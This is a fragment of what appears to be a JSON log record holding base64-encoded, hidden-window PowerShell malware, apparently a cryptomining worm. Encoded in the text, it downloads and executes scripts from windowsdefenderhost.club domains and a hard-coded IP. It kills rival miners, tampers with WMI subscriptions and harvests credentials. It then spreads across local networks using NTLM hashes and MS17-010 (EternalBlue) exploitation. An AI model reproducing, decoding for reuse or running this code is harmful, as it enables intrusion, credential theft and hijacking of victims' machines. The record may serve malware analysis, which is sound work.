CQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHU